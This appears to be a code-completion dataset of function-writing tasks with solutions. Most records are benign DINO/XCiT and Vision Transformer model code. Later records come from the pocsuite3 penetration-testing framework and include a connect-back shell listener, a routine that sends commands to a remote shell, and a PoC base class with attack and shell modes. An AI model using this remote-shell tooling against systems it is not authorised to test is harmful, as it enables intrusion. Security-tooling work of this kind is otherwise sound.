url="https://dl.fbaipublicfiles.com/dino/dino_xcit_small_12_p16_pretrain/dino_xcit_small_12_p16_pretrain.pth",
map_location="cpu",
)
model.load_state_dict(state_dict, strict=True)
return model | XCiT-Small-12/16 pre-trained with DINO. |
161,750 | import torch
from torchvision.models.resnet import resnet50
import vision_transformer as vits
The provided code snippet includes necessary dependencies for implementing the `dino_xcit_small_12_p8` function. Write a Python function `def dino_xcit_small_12_p8(pretrained=True, **kwargs)` to solve the following problem:
XCiT-Small-12/8 pre-trained with DINO.
Here is the function:
def dino_xcit_small_12_p8(pretrained=True, **kwargs):
"""
XCiT-Small-12/8 pre-trained with DINO.
"""
model = torch.hub.load('facebookresearch/xcit:main', "xcit_small_12_p8", num_classes=0, **kwargs)
if pretrained:
state_dict = torch.hub.load_state_dict_from_url(
url="https://dl.fbaipublicfiles.com/dino/dino_xcit_small_12_p8_pretrain/dino_xcit_small_12_p8_pretrain.pth",
map_location="cpu",
)
model.load_state_dict(state_dict, strict=True)
return model | XCiT-Small-12/8 pre-trained with DINO. |
161,751 | import torch
from torchvision.models.resnet import resnet50
import vision_transformer as vits
The provided code snippet includes necessary dependencies for implementing the `dino_xcit_medium_24_p16` function. Write a Python function `def dino_xcit_medium_24_p16(pretrained=True, **kwargs)` to solve the following problem:
XCiT-Medium-24/16 pre-trained with DINO.
Here is the function:
def dino_xcit_medium_24_p16(pretrained=True, **kwargs):
"""
XCiT-Medium-24/16 pre-trained with DINO.
"""
model = torch.hub.load('facebookresearch/xcit:main', "xcit_medium_24_p16", num_classes=0, **kwargs)
if pretrained:
state_dict = torch.hub.load_state_dict_from_url(
url="https://dl.fbaipublicfiles.com/dino/dino_xcit_medium_24_p16_pretrain/dino_xcit_medium_24_p16_pretrain.pth",
map_location="cpu",
)
model.load_state_dict(state_dict, strict=True)
return model | XCiT-Medium-24/16 pre-trained with DINO. |
161,752 | import torch
from torchvision.models.resnet import resnet50
import vision_transformer as vits
The provided code snippet includes necessary dependencies for implementing the `dino_xcit_medium_24_p8` function. Write a Python function `def dino_xcit_medium_24_p8(pretrained=True, **kwargs)` to solve the following problem:
XCiT-Medium-24/8 pre-trained with DINO.
Here is the function:
def dino_xcit_medium_24_p8(pretrained=True, **kwargs):
"""
XCiT-Medium-24/8 pre-trained with DINO.
"""
model = torch.hub.load('facebookresearch/xcit:main', "xcit_medium_24_p8", num_classes=0, **kwargs)
if pretrained:
state_dict = torch.hub.load_state_dict_from_url(
url="https://dl.fbaipublicfiles.com/dino/dino_xcit_medium_24_p8_pretrain/dino_xcit_medium_24_p8_pretrain.pth",
map_location="cpu",
)
model.load_state_dict(state_dict, strict=True)
return model | XCiT-Medium-24/8 pre-trained with DINO. |
161,753 | import math
from functools import partial
import torch
import torch.nn as nn
from utils import trunc_normal_
def drop_path(x, drop_prob: float = 0., training: bool = False):
if drop_prob == 0. or not training:
return x
keep_prob = 1 - drop_prob
shape = (x.shape[0],) + (1,) * (x.ndim - 1) # work with diff dim tensors, not just 2D ConvNets
random_tensor = keep_prob + torch.rand(shape, dtype=x.dtype, device=x.device)
random_tensor.floor_() # binarize
output = x.div(keep_prob) * random_tensor
return output | null |
161,754 | import math
from functools import partial
import torch
import torch.nn as nn
from utils import trunc_normal_
class VisionTransformer(nn.Module):
""" Vision Transformer """
def __init__(self, img_size=[224], patch_size=16, in_chans=3, num_classes=0, embed_dim=768, depth=12,
num_heads=12, mlp_ratio=4., qkv_bias=False, qk_scale=None, drop_rate=0., attn_drop_rate=0.,
drop_path_rate=0., norm_layer=nn.LayerNorm, **kwargs):
super().__init__()
self.num_features = self.embed_dim = embed_dim
self.patch_embed = PatchEmbed(
img_size=img_size[0], patch_size=patch_size, in_chans=in_chans, embed_dim=embed_dim)
num_patches = self.patch_embed.num_patches
self.cls_token = nn.Parameter(torch.zeros(1, 1, embed_dim))
self.pos_embed = nn.Parameter(torch.zeros(1, num_patches + 1, embed_dim))
self.pos_drop = nn.Dropout(p=drop_rate)
dpr = [x.item() for x in torch.linspace(0, drop_path_rate, depth)] # stochastic depth decay rule
self.blocks = nn.ModuleList([
Block(
dim=embed_dim, num_heads=num_heads, mlp_ratio=mlp_ratio, qkv_bias=qkv_bias, qk_scale=qk_scale,
drop=drop_rate, attn_drop=attn_drop_rate, drop_path=dpr[i], norm_layer=norm_layer)
for i in range(depth)])
self.norm = norm_layer(embed_dim)
# Classifier head
self.head = nn.Linear(embed_dim, num_classes) if num_classes > 0 else nn.Identity()
trunc_normal_(self.pos_embed, std=.02)
trunc_normal_(self.cls_token, std=.02)
self.apply(self._init_weights)
def _init_weights(self, m):
if isinstance(m, nn.Linear):
trunc_normal_(m.weight, std=.02)
if isinstance(m, nn.Linear) and m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.LayerNorm):
nn.init.constant_(m.bias, 0)
nn.init.constant_(m.weight, 1.0)
def interpolate_pos_encoding(self, x, w, h):
npatch = x.shape[1] - 1
N = self.pos_embed.shape[1] - 1
if npatch == N and w == h:
return self.pos_embed
class_pos_embed = self.pos_embed[:, 0]
patch_pos_embed = self.pos_embed[:, 1:]
dim = x.shape[-1]
w0 = w // self.patch_embed.patch_size
h0 = h // self.patch_embed.patch_size
# we add a small number to avoid floating point error in the interpolation
# see discussion at https://github.com/facebookresearch/dino/issues/8
w0, h0 = w0 + 0.1, h0 + 0.1
patch_pos_embed = nn.functional.interpolate(
patch_pos_embed.reshape(1, int(math.sqrt(N)), int(math.sqrt(N)), dim).permute(0, 3, 1, 2),
scale_factor=(w0 / math.sqrt(N), h0 / math.sqrt(N)),
mode='bicubic',
)
assert int(w0) == patch_pos_embed.shape[-2] and int(h0) == patch_pos_embed.shape[-1]
patch_pos_embed = patch_pos_embed.permute(0, 2, 3, 1).view(1, -1, dim)
return torch.cat((class_pos_embed.unsqueeze(0), patch_pos_embed), dim=1)
def prepare_tokens(self, x):
B, nc, w, h = x.shape
x = self.patch_embed(x) # patch linear embedding
# add the [CLS] token to the embed patch tokens
cls_tokens = self.cls_token.expand(B, -1, -1)
x = torch.cat((cls_tokens, x), dim=1)
# add positional encoding to each token
x = x + self.interpolate_pos_encoding(x, w, h)
return self.pos_drop(x)
def forward(self, x):
x = self.prepare_tokens(x)
for blk in self.blocks:
x = blk(x)
x = self.norm(x)
return x[:, 0]
def get_last_selfattention(self, x):
x = self.prepare_tokens(x)
for i, blk in enumerate(self.blocks):
if i < len(self.blocks) - 1:
x = blk(x)
else:
# return attention of the last block
return blk(x, return_attention=True)
def get_intermediate_layers(self, x, n=1):
x = self.prepare_tokens(x)
# we return the output tokens from the `n` last blocks
output = []
for i, blk in enumerate(self.blocks):
x = blk(x)
if len(self.blocks) - i <= n:
output.append(self.norm(x))
return output
def vit_tiny(patch_size=16, **kwargs):
model = VisionTransformer(
patch_size=patch_size, embed_dim=192, depth=12, num_heads=3, mlp_ratio=4,
qkv_bias=True, norm_layer=partial(nn.LayerNorm, eps=1e-6), **kwargs)
return model | null |
161,755 | import math
from functools import partial
import torch
import torch.nn as nn
from utils import trunc_normal_
class VisionTransformer(nn.Module):
""" Vision Transformer """
def __init__(self, img_size=[224], patch_size=16, in_chans=3, num_classes=0, embed_dim=768, depth=12,
num_heads=12, mlp_ratio=4., qkv_bias=False, qk_scale=None, drop_rate=0., attn_drop_rate=0.,
drop_path_rate=0., norm_layer=nn.LayerNorm, **kwargs):
super().__init__()
self.num_features = self.embed_dim = embed_dim
self.patch_embed = PatchEmbed(
img_size=img_size[0], patch_size=patch_size, in_chans=in_chans, embed_dim=embed_dim)
num_patches = self.patch_embed.num_patches
self.cls_token = nn.Parameter(torch.zeros(1, 1, embed_dim))
self.pos_embed = nn.Parameter(torch.zeros(1, num_patches + 1, embed_dim))
self.pos_drop = nn.Dropout(p=drop_rate)
dpr = [x.item() for x in torch.linspace(0, drop_path_rate, depth)] # stochastic depth decay rule
self.blocks = nn.ModuleList([
Block(
dim=embed_dim, num_heads=num_heads, mlp_ratio=mlp_ratio, qkv_bias=qkv_bias, qk_scale=qk_scale,
drop=drop_rate, attn_drop=attn_drop_rate, drop_path=dpr[i], norm_layer=norm_layer)
for i in range(depth)])
self.norm = norm_layer(embed_dim)
# Classifier head
self.head = nn.Linear(embed_dim, num_classes) if num_classes > 0 else nn.Identity()
trunc_normal_(self.pos_embed, std=.02)
trunc_normal_(self.cls_token, std=.02)
self.apply(self._init_weights)
def _init_weights(self, m):
if isinstance(m, nn.Linear):
trunc_normal_(m.weight, std=.02)
if isinstance(m, nn.Linear) and m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.LayerNorm):
nn.init.constant_(m.bias, 0)
nn.init.constant_(m.weight, 1.0)
def interpolate_pos_encoding(self, x, w, h):
npatch = x.shape[1] - 1
N = self.pos_embed.shape[1] - 1
if npatch == N and w == h:
return self.pos_embed
class_pos_embed = self.pos_embed[:, 0]
patch_pos_embed = self.pos_embed[:, 1:]
dim = x.shape[-1]
w0 = w // self.patch_embed.patch_size
h0 = h // self.patch_embed.patch_size
# we add a small number to avoid floating point error in the interpolation
# see discussion at https://github.com/facebookresearch/dino/issues/8
w0, h0 = w0 + 0.1, h0 + 0.1
patch_pos_embed = nn.functional.interpolate(
patch_pos_embed.reshape(1, int(math.sqrt(N)), int(math.sqrt(N)), dim).permute(0, 3, 1, 2),
scale_factor=(w0 / math.sqrt(N), h0 / math.sqrt(N)),
mode='bicubic',
)
assert int(w0) == patch_pos_embed.shape[-2] and int(h0) == patch_pos_embed.shape[-1]
patch_pos_embed = patch_pos_embed.permute(0, 2, 3, 1).view(1, -1, dim)
return torch.cat((class_pos_embed.unsqueeze(0), patch_pos_embed), dim=1)
def prepare_tokens(self, x):
B, nc, w, h = x.shape
x = self.patch_embed(x) # patch linear embedding
# add the [CLS] token to the embed patch tokens
cls_tokens = self.cls_token.expand(B, -1, -1)
x = torch.cat((cls_tokens, x), dim=1)
# add positional encoding to each token
x = x + self.interpolate_pos_encoding(x, w, h)
return self.pos_drop(x)
def forward(self, x):
x = self.prepare_tokens(x)
for blk in self.blocks:
x = blk(x)
x = self.norm(x)
return x[:, 0]
def get_last_selfattention(self, x):
x = self.prepare_tokens(x)
for i, blk in enumerate(self.blocks):
if i < len(self.blocks) - 1:
x = blk(x)
else:
# return attention of the last block
return blk(x, return_attention=True)
def get_intermediate_layers(self, x, n=1):
x = self.prepare_tokens(x)
# we return the output tokens from the `n` last blocks
output = []
for i, blk in enumerate(self.blocks):
x = blk(x)
if len(self.blocks) - i <= n:
output.append(self.norm(x))
return output
def vit_small(patch_size=16, **kwargs):
model = VisionTransformer(
patch_size=patch_size, embed_dim=384, depth=12, num_heads=6, mlp_ratio=4,
qkv_bias=True, norm_layer=partial(nn.LayerNorm, eps=1e-6), **kwargs)
return model | null |
161,756 | import math
from functools import partial
import torch
import torch.nn as nn
from utils import trunc_normal_
class VisionTransformer(nn.Module):
""" Vision Transformer """
def __init__(self, img_size=[224], patch_size=16, in_chans=3, num_classes=0, embed_dim=768, depth=12,
num_heads=12, mlp_ratio=4., qkv_bias=False, qk_scale=None, drop_rate=0., attn_drop_rate=0.,
drop_path_rate=0., norm_layer=nn.LayerNorm, **kwargs):
super().__init__()
self.num_features = self.embed_dim = embed_dim
self.patch_embed = PatchEmbed(
img_size=img_size[0], patch_size=patch_size, in_chans=in_chans, embed_dim=embed_dim)
num_patches = self.patch_embed.num_patches
self.cls_token = nn.Parameter(torch.zeros(1, 1, embed_dim))
self.pos_embed = nn.Parameter(torch.zeros(1, num_patches + 1, embed_dim))
self.pos_drop = nn.Dropout(p=drop_rate)
dpr = [x.item() for x in torch.linspace(0, drop_path_rate, depth)] # stochastic depth decay rule
self.blocks = nn.ModuleList([
Block(
dim=embed_dim, num_heads=num_heads, mlp_ratio=mlp_ratio, qkv_bias=qkv_bias, qk_scale=qk_scale,
drop=drop_rate, attn_drop=attn_drop_rate, drop_path=dpr[i], norm_layer=norm_layer)
for i in range(depth)])
self.norm = norm_layer(embed_dim)
# Classifier head
self.head = nn.Linear(embed_dim, num_classes) if num_classes > 0 else nn.Identity()
trunc_normal_(self.pos_embed, std=.02)
trunc_normal_(self.cls_token, std=.02)
self.apply(self._init_weights)
def _init_weights(self, m):
if isinstance(m, nn.Linear):
trunc_normal_(m.weight, std=.02)
if isinstance(m, nn.Linear) and m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.LayerNorm):
nn.init.constant_(m.bias, 0)
nn.init.constant_(m.weight, 1.0)
def interpolate_pos_encoding(self, x, w, h):
npatch = x.shape[1] - 1
N = self.pos_embed.shape[1] - 1
if npatch == N and w == h:
return self.pos_embed
class_pos_embed = self.pos_embed[:, 0]
patch_pos_embed = self.pos_embed[:, 1:]
dim = x.shape[-1]
w0 = w // self.patch_embed.patch_size
h0 = h // self.patch_embed.patch_size
# we add a small number to avoid floating point error in the interpolation
# see discussion at https://github.com/facebookresearch/dino/issues/8
w0, h0 = w0 + 0.1, h0 + 0.1
patch_pos_embed = nn.functional.interpolate(
patch_pos_embed.reshape(1, int(math.sqrt(N)), int(math.sqrt(N)), dim).permute(0, 3, 1, 2),
scale_factor=(w0 / math.sqrt(N), h0 / math.sqrt(N)),
mode='bicubic',
)
assert int(w0) == patch_pos_embed.shape[-2] and int(h0) == patch_pos_embed.shape[-1]
patch_pos_embed = patch_pos_embed.permute(0, 2, 3, 1).view(1, -1, dim)
return torch.cat((class_pos_embed.unsqueeze(0), patch_pos_embed), dim=1)
def prepare_tokens(self, x):
B, nc, w, h = x.shape
x = self.patch_embed(x) # patch linear embedding
# add the [CLS] token to the embed patch tokens
cls_tokens = self.cls_token.expand(B, -1, -1)
x = torch.cat((cls_tokens, x), dim=1)
# add positional encoding to each token
x = x + self.interpolate_pos_encoding(x, w, h)
return self.pos_drop(x)
def forward(self, x):
x = self.prepare_tokens(x)
for blk in self.blocks:
x = blk(x)
x = self.norm(x)
return x[:, 0]
def get_last_selfattention(self, x):
x = self.prepare_tokens(x)
for i, blk in enumerate(self.blocks):
if i < len(self.blocks) - 1:
x = blk(x)
else:
# return attention of the last block
return blk(x, return_attention=True)
def get_intermediate_layers(self, x, n=1):
x = self.prepare_tokens(x)
# we return the output tokens from the `n` last blocks
output = []
for i, blk in enumerate(self.blocks):
x = blk(x)
if len(self.blocks) - i <= n:
output.append(self.norm(x))
return output
def vit_base(patch_size=16, **kwargs):
model = VisionTransformer(
patch_size=patch_size, embed_dim=768, depth=12, num_heads=12, mlp_ratio=4,
qkv_bias=True, norm_layer=partial(nn.LayerNorm, eps=1e-6), **kwargs)
return model | null |
161,757 | import os
def find_packages(where='.'):
# os.walk -> list[(dirname, list[subdirs], list[files])]
return [folder.replace(os.sep, ".").strip(".")
for (folder, _, files) in os.walk(where)
if "__init__.py" in files] | null |
161,758 | import base64
import pickle
import zlib
import select
import socket
import threading
import time
import os
from pocsuite3.lib.utils import gen_cert
from pocsuite3.lib.core.common import data_to_stdout, has_poll, get_unicode, mosaic
from pocsuite3.lib.core.data import conf, kb, logger, paths
from pocsuite3.lib.core.datatype import AttribDict
from pocsuite3.lib.core.enums import AUTOCOMPLETE_TYPE, OS, CUSTOM_LOGGING
from pocsuite3.lib.core.exception import PocsuiteShellQuitException
from pocsuite3.lib.core.settings import DEFAULT_LISTENER_PORT
from pocsuite3.lib.core.shell import auto_completion, clear_history, save_history, load_history
from pocsuite3.lib.core.threads import exception_handled_function
def get_sock_listener(listen_port, listen_host="0.0.0.0", ipv6=False, protocol=None):
if protocol in [None, "TCP"]:
protocol = socket.SOCK_STREAM
elif protocol in ["UDP"]:
protocol = socket.SOCK_DGRAM
if ipv6:
s = socket.socket(socket.AF_INET6, protocol)
if listen_host == "0.0.0.0":
listen_host = "::"
else:
s = socket.socket(socket.AF_INET, protocol)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
msg = ''
if conf.enable_tls_listener and protocol == socket.SOCK_STREAM:
import ssl
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
cert_path = os.path.join(paths.POCSUITE_TMP_PATH, 'cacert.pem')
gen_cert(filepath=cert_path)
context.load_cert_chain(cert_path)
s = context.wrap_socket(s, server_side=True)
msg = 'TLS '
try:
s.bind((listen_host, listen_port))
except socket.error:
s.close()
if conf.connect_back_host in kb.data.local_ips:
logger.warn(f'unable to listen on {listen_host}:{listen_port}, check if the port is occupied.')
return None
if protocol == socket.SOCK_STREAM:
msg += "listening on {0}:{1}".format(listen_host, listen_port)
logger.log(CUSTOM_LOGGING.SYSINFO, msg)
s.listen(5)
return s
DEFAULT_LISTENER_PORT = 6666
def get_udp_listener(listen_port=DEFAULT_LISTENER_PORT, listen_host="0.0.0.0", ipv6=False):
return get_sock_listener(listen_port, listen_host, ipv6, "UDP") | null |
161,759 | import base64
import pickle
import zlib
import select
import socket
import threading
import time
import os
from pocsuite3.lib.utils import gen_cert
from pocsuite3.lib.core.common import data_to_stdout, has_poll, get_unicode, mosaic
from pocsuite3.lib.core.data import conf, kb, logger, paths
from pocsuite3.lib.core.datatype import AttribDict
from pocsuite3.lib.core.enums import AUTOCOMPLETE_TYPE, OS, CUSTOM_LOGGING
from pocsuite3.lib.core.exception import PocsuiteShellQuitException
from pocsuite3.lib.core.settings import DEFAULT_LISTENER_PORT
from pocsuite3.lib.core.shell import auto_completion, clear_history, save_history, load_history
from pocsuite3.lib.core.threads import exception_handled_function
def listener_worker():
s = get_tcp_listener(ipv6=conf.ipv6, listen_port=int(conf.connect_back_port))
while True:
try:
conn, address = s.accept()
conn.setblocking(1)
client = AttribDict()
client.conn = conn
client.address = address
kb.data.clients.append(client)
info_msg = "new connection established from {0}".format(mosaic(address[0]))
logger.log(CUSTOM_LOGGING.SUCCESS, info_msg)
except Exception:
pass
def exception_handled_function(thread_function, args=(), silent=False):
try:
thread_function(*args)
except KeyboardInterrupt:
kb.thread_continue = False
kb.thread_exception = True
raise
except Exception as ex:
if not silent:
logger.error("thread {0}: {1}".format(threading.currentThread().getName(), str(ex)))
if conf.verbose > 1:
traceback.print_exc()
def start_listener():
t = threading.Thread(target=exception_handled_function, name="listener-thread", args=[listener_worker])
t.setDaemon(True)
t.start() | null |
161,760 | import os
import socket
import zlib
import pickle
import base64
import select
import telnetlib
import threading
from pocsuite3.lib.core.poc import POCBase
from pocsuite3.lib.utils import random_str
from pocsuite3.lib.core.common import check_port
from pocsuite3.lib.core.data import conf, logger
def read_results(conn, inputs):
if isinstance(conn, telnetlib.Telnet):
flag = random_str(6).encode()
inputs = inputs.strip() + b';' + flag + b'\n'
results = b''
conn.write(inputs)
count = 10
while count:
count -= 1
chunk = conn.read_until(random_str(6).encode(), 0.2)
if len(chunk) > 0:
results += chunk
if results.count(flag) >= 2:
# remove the Telnet input echo
results = results.split(inputs.strip())[-1]
results = os.linesep.encode().join(
results.split(flag)[0].splitlines()[0:-1])
return results.strip() + b'\n'
elif callable(conn):
results = conn(inputs.decode())
if not isinstance(results, bytes):
results = results.encode()
if results.strip() == b'':
results = b'COMMAND NO OUTPUT\n'
return results
elif isinstance(conn, socket.socket):
flag = random_str(6).encode()
inputs = inputs.strip() + b';' + flag + b'\n'
conn.send(inputs)
count = 10
results = b''
while count:
count -= 1
ready = select.select([conn], [], [], 0.2)
if ready[0]:
chunk = conn.recv(1024)
results += chunk
if results.count(flag) >= 2:
break
results = results.split(inputs.strip())[-1]
results = os.linesep.encode().join(
results.split(flag)[0].splitlines()[0:-1])
return results.strip() + b'\n'
return b'\n'
def start_listener(conn):
t = threading.Thread(target=flow_redirect,
name="bind-listener-thread",
args=[conn])
t.setDaemon(True)
t.start()
class POCBase(object):
def __init__(self):
# PoC attributes
self.vulID = getattr(self, 'vulID', '0')
self.version = getattr(self, 'version', '1')
self.author = getattr(self, 'author', '')
self.vulDate = getattr(self, 'vulDate', '')
self.createDate = getattr(self, 'createDate', '')
self.updateDate = getattr(self, 'updateDate', '')
self.references = getattr(self, 'references', [])
self.name = getattr(self, 'name', '')
self.appPowerLink = getattr(self, 'appPowerLink', '')
self.appName = getattr(self, 'appName', '')
self.appVersion = getattr(self, 'appVersion', '')
self.vulType = getattr(self, 'vulType', '')
self.desc = getattr(self, 'desc', '')
self.samples = getattr(self, 'samples', [])
self.install_requires = getattr(self, 'install_requires', [])
self.dork = getattr(self, 'dork', {})
self.suricata_request = getattr(self, 'suricata_request', '')
self.suricata_response = getattr(self, 'suricata_response', '')
#
self.type = None
self.target = None
self.headers = None
self.url = None
self.scheme = None
self.rhost = None
self.rport = None
self.netloc = None
self.mode = None
self.params = None
self.verbose = None
self.expt = (0, 'None')
self.current_protocol = getattr(self, "protocol", POC_CATEGORY.PROTOCOL.HTTP)
self.current_protocol_port = getattr(self, "protocol_default_port", 0)
self.pocDesc = getattr(self, "pocDesc", "Poc的作者好懒呀!")
self.host_ip = get_host_ip(check_private=False)
# gloabl options init
self.global_options = OrderedDict()
if self.current_protocol == POC_CATEGORY.PROTOCOL.HTTP:
self.global_options["target"] = OptString("",
"Target HTTP, IPv4, IPv6 address or file with ip:port (file://)",
require=True)
self.global_options["referer"] = OptString("", "HTTP Referer header value")
self.global_options["agent"] = OptString("", "HTTP User-Agent header value")
self.global_options["proxy"] = OptString(
"", "Use a proxy to connect to the target URL (protocol://host:port)")
self.global_options["timeout"] = OptInteger(10, "Seconds to wait before timeout connection (default 10)")
else:
self.global_options["rhost"] = OptString('', 'The target host', require=True)
self.global_options["rport"] = OptPort('', 'The target port', require=True)
# payload options for exploit
self.payload_options = OrderedDict()
if hasattr(self, "_shell"):
self.payload_options["lhost"] = OptString(self.host_ip, "The listen address")
self.payload_options["lport"] = OptPort(6666, "The listen port")
self.options = OrderedDict()
# module options init
if hasattr(self, "_options"):
self.options.update(self._options())
def get_options(self):
tmp = OrderedDict()
for k, v in self.options.items():
tmp[k] = v
for k, v in self.payload_options.items():
tmp[k] = v
for k, v in self.global_options.items():
tmp[k] = v
return tmp
# return self.options.update(self.global_options).update(self.payload_options)
def get_option(self, name):
if name not in self.options:
raise PocsuiteValidationException
# 处理options中的payload, 将Payload的IP和端口转换
value = self.options[name].value
flag = re.search(r'\{0\}.+\{1\}', str(value))
if flag:
value = value.format(conf.connect_back_host, conf.connect_back_port)
return value
def get_infos(self):
'''
得到Poc的信息,返回dict
:return:
'''
fields = ["name", "VulID", "version", "author", "vulDate", "createDate", "updateDate", "references",
"appPowerLink", "appName", "appVersion", "vulType", "desc", "pocDesc", "current_protocol"]
data = {
}
for field in fields:
value = getattr(self, field, None)
if value:
data[field] = value
return data
def getg_option(self, name):
if name not in self.global_options:
raise PocsuiteValidationException
r = self.global_options[name].value if self.global_options[name].value != "" else 0
return r
def getp_option(self, name):
if name not in self.payload_options:
raise PocsuiteValidationException
return self.payload_options[name].value
def get_category(self):
return self.category if hasattr(self, 'category') else 'Unknown'
def set_options(self, kwargs):
if hasattr(self, 'options'):
self.options.update(kwargs)
else:
self.options = kwargs
def set_option(self, key, value):
# if not hasattr(self, 'options'):
# self.options = {}
if key not in self.options:
raise PocsuiteValidationException("No key " + key)
self.options[key].__set__("", value)
def setg_option(self, key, value):
if key not in self.global_options:
raise PocsuiteValidationException("No key " + key)
self.global_options[key].__set__("", value)
def setp_option(self, key, value):
if key not in self.payload_options:
raise PocsuiteValidationException("No key " + key)
self.payload_options[key].__set__("", value)
def check_requirement(self, *args):
for option in args:
for k, v in option.items():
if v.require and v.value == "":
raise PocsuiteValidationException(
"'{key}' must be set, please using command 'set {key}'".format(key=k))
return True
def build_url(self, target=''):
if not target:
target = self.target
# https://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers
protocol_default_port_map = {
POC_CATEGORY.PROTOCOL.FTP: 21,
POC_CATEGORY.PROTOCOL.SSH: 22,
POC_CATEGORY.PROTOCOL.TELNET: 23,
POC_CATEGORY.PROTOCOL.REDIS: 6379,
POC_CATEGORY.PROTOCOL.SMTP: 25,
POC_CATEGORY.PROTOCOL.DNS: 53,
POC_CATEGORY.PROTOCOL.SNMP: 161,
POC_CATEGORY.PROTOCOL.SMB: 445,
POC_CATEGORY.PROTOCOL.MQTT: 1883,
POC_CATEGORY.PROTOCOL.MYSQL: 3306,
POC_CATEGORY.PROTOCOL.RDP: 3389,
POC_CATEGORY.PROTOCOL.UPNP: 1900,
POC_CATEGORY.PROTOCOL.AJP: 8009,
POC_CATEGORY.PROTOCOL.XMPP: 5222,
POC_CATEGORY.PROTOCOL.WINBOX: 8291,
POC_CATEGORY.PROTOCOL.MEMCACHED: 11211,
POC_CATEGORY.PROTOCOL.BACNET: 47808,
POC_CATEGORY.PROTOCOL.T3: 7001,
}
if self.current_protocol_port:
protocol_default_port_map[self.current_protocol] = self.current_protocol_port
try:
pr = urlparse(target)
is_ipv6 = pr.netloc.startswith('[')
self.scheme = pr.scheme
self.rhost = pr.hostname
self.rport = pr.port or self.current_protocol_port
# if protocol is not provided and the port endswith 443, we adjust the protocol to https
if (self.current_protocol not in protocol_default_port_map or
self.current_protocol == POC_CATEGORY.PROTOCOL.HTTP):
if self.scheme not in ['http', 'https']:
self.scheme = 'https' if str(self.rport).endswith('443') else 'http'
self.rport = self.rport if self.rport else 443 if self.scheme == 'https' else 80
else:
# adjust protocol
self.scheme = self.current_protocol.lower()
# adjust port
if not self.rport:
self.rport = protocol_default_port_map[self.current_protocol]
self.netloc = f'[{self.rhost}]:{self.rport}' if is_ipv6 else f'{self.rhost}:{self.rport}'
pr = pr._replace(scheme=self.scheme)
pr = pr._replace(netloc=self.netloc)
target = pr.geturl()
except ValueError:
pass
if self.target and self.current_protocol != POC_CATEGORY.PROTOCOL.HTTP and not conf.console_mode:
self.setg_option("rhost", self.rhost)
self.setg_option("rport", self.rport)
return target.rstrip('/')
def _execute(self):
if self.mode == 'shell':
if not hasattr(self, "_shell"):
raise NotImplementedError
output = self._shell()
elif self.mode == 'attack':
output = self._attack()
else:
output = self._verify()
return output
def execute(self, target, headers=None, params=None, mode='verify', verbose=True):
self.target = target
self.url = self.build_url()
if self.url != self.target:
logger.debug(f'auto correct url: {mosaic(self.target)} -> {mosaic(self.url)}')
# TODO: Thread safe problem in self.headers
# https://github.com/knownsec/pocsuite3/issues/262
# The value should not be modified in PoC Plugin !!!
# Some PoC use this bug as a feature, For the purpose of PoC plugin compatibility, it will not be fixed
self.headers = headers
if isinstance(params, dict) or isinstance(params, str):
self.params = params
else:
self.params = {}
self.mode = mode
self.verbose = verbose
self.expt = (0, 'None')
# TODO
output = None
try:
output = self._execute()
except NotImplementedError as e:
self.expt = (ERROR_TYPE_ID.NOTIMPLEMENTEDERROR, e)
logger.log(CUSTOM_LOGGING.ERROR, 'POC: {0} not defined "{1}" mode'.format(self.name, self.mode))
output = Output(self)
except ConnectTimeout as e:
self.expt = (ERROR_TYPE_ID.CONNECTTIMEOUT, e)
while conf.retry > 0:
logger.debug('connect target {0} timeout, retry it.'.format(mosaic(target)))
try:
output = self._execute()
break
except Exception:
logger.debug('target {0} retry failed!'.format(mosaic(target)))
conf.retry -= 1
if output is None:
msg = "connect target '{0}' failed!".format(mosaic(target))
logger.error(msg)
output = Output(self)
except HTTPError as e:
self.expt = (ERROR_TYPE_ID.HTTPERROR, e)
logger.warn('target {0} HTTPError occurs.'.format(mosaic(target)))
output = Output(self)
except ConnectionError as e:
self.expt = (ERROR_TYPE_ID.CONNECTIONERROR, e)
msg = "connect target '{0}' failed!".format(mosaic(target))
logger.error(msg)
output = Output(self)
except TooManyRedirects as e:
self.expt = (ERROR_TYPE_ID.TOOMANYREDIRECTS, e)
logger.debug(str(e))
output = Output(self)
except BaseException as e:
self.expt = (ERROR_TYPE_ID.OTHER, e)
logger.error("PoC has raised a exception")
logger.error(str(traceback.format_exc()))
# logger.exception(e)
output = Output(self)
if output:
output.params = self.params
return output
def _check(self, dork='', allow_redirects=False, return_obj=False, is_http=True, honeypot_check=True):
if conf.get('no_check', False):
return True
u = urlparse(self.url)
# the port closed
if u.port and not check_port(u.hostname, u.port):
logger.debug(f'{mosaic(self.url)}, the port is closed.')
return False
if is_http is False or self.current_protocol != POC_CATEGORY.PROTOCOL.HTTP:
return True
res = None
# this only covers most cases
redirect_https_keyword = [
# https://www.zoomeye.org/searchResult?q=%22request%20was%20sent%20to%20HTTPS%20port%22
'request was sent to https port',
# https://www.zoomeye.org/searchResult?q=%22running%20in%20SSL%20mode.%20Try%22
'running in ssl mode. try'
]
redirect_https_keyword_found = False
origin_url = self.url
netloc = self.url.split('://', 1)[-1]
urls = OrderedSet()
urls.add(self.url)
urls.add(f'http://{netloc}')
# The user has not provided a port in URL, dynamically switching to HTTPS's default port 443
pr = urlparse(self.url)
is_ipv6 = pr.netloc.startswith('[')
if ':' not in self.target.split('://')[-1] and pr.port == 80:
pr = pr._replace(scheme='https')
pr = pr._replace(netloc=f'[{pr.hostname}]:443' if is_ipv6 else f'{pr.hostname}:443')
urls.add(pr.geturl())
else:
urls.add(f'https://{netloc}')
for url in urls:
try:
time.sleep(0.1)
res = requests.get(url, allow_redirects=allow_redirects)
"""
https://github.com/knownsec/pocsuite3/issues/330
https://github.com/knownsec/pocsuite3/issues/356
status_code:
- 20x
- 30x
- 40x
- 50x
"""
# if HTTPS handshake is successful, return directly
if url.startswith('https://'):
break
# if we send an HTTP request to an HTTPS service, but the server may return 20x
for k in redirect_https_keyword:
if k.lower() in res.text.lower():
redirect_https_keyword_found = True
break
if redirect_https_keyword_found:
continue
# if we send an HTTP request to an HTTPS service, the server may return 30x, 40x, or 50x...
if not str(res.status_code).startswith('20'):
continue
break
except requests.RequestException:
pass
if not isinstance(res, requests.Response):
return False
self.url = res.request.url.rstrip('/')
if res.history:
self.url = res.history[0].request.url.rstrip('/')
